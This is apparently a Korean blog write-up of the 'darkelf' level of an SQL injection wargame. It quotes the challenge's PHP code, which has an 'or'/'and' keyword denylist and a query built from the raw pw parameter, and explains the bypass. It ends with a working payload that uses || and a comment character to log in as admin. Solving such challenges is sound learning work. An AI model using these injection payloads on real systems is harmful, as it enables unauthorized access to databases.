언우s 2018. 4. 11. 09:31

6. darkelf


// Keyword denylist: stops the script with "HeHe" when the pw parameter contains
// "or" or "and" anywhere, case-insensitively (the /i flag).
// The pattern only covers these two words. It does nothing about quotes, comment
// characters or symbolic operators, so it is not an injection defence by itself.
// NOTE(review): the unquoted key pw relies on older PHP treating an undefined
// constant as the string 'pw'. Confirm the PHP version the challenge targets.
if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe"); 

or, and 문자열을 대소문자 구분 없이 필터링
// Builds the SQL text by interpolating the raw pw parameter inside single quotes.
// The id condition is fixed to 'guest'; only pw comes from the request.
// Because pw is concatenated rather than bound, a quote character in pw ends the
// string literal and whatever follows is parsed as SQL. A prepared statement with
// a bound parameter would keep pw as data whatever characters it contains.
$query = "select id from prob_darkelf where id='guest' and pw='{$_GET[pw]}'"; 

id=guest
// Success condition: solve("darkelf") is called only when the id field of $result
// is 'admin' (loose == comparison).
// NOTE(review): $result is presumably the row fetched for $query. The fetch is not
// shown in this excerpt.
if($result['id'] == 'admin') solve("darkelf"); 

id=admin 이어야 클리어

or, and는 ||, &&로 우회 가능. 키워드 블랙리스트는 같은 의미의 연산자를 막지 못하므로, 근본적인 대책은 입력을 prepared statement의 파라미터로 바인딩하는 것이다.

?pw=%27%20||%20id=%27admin%27%23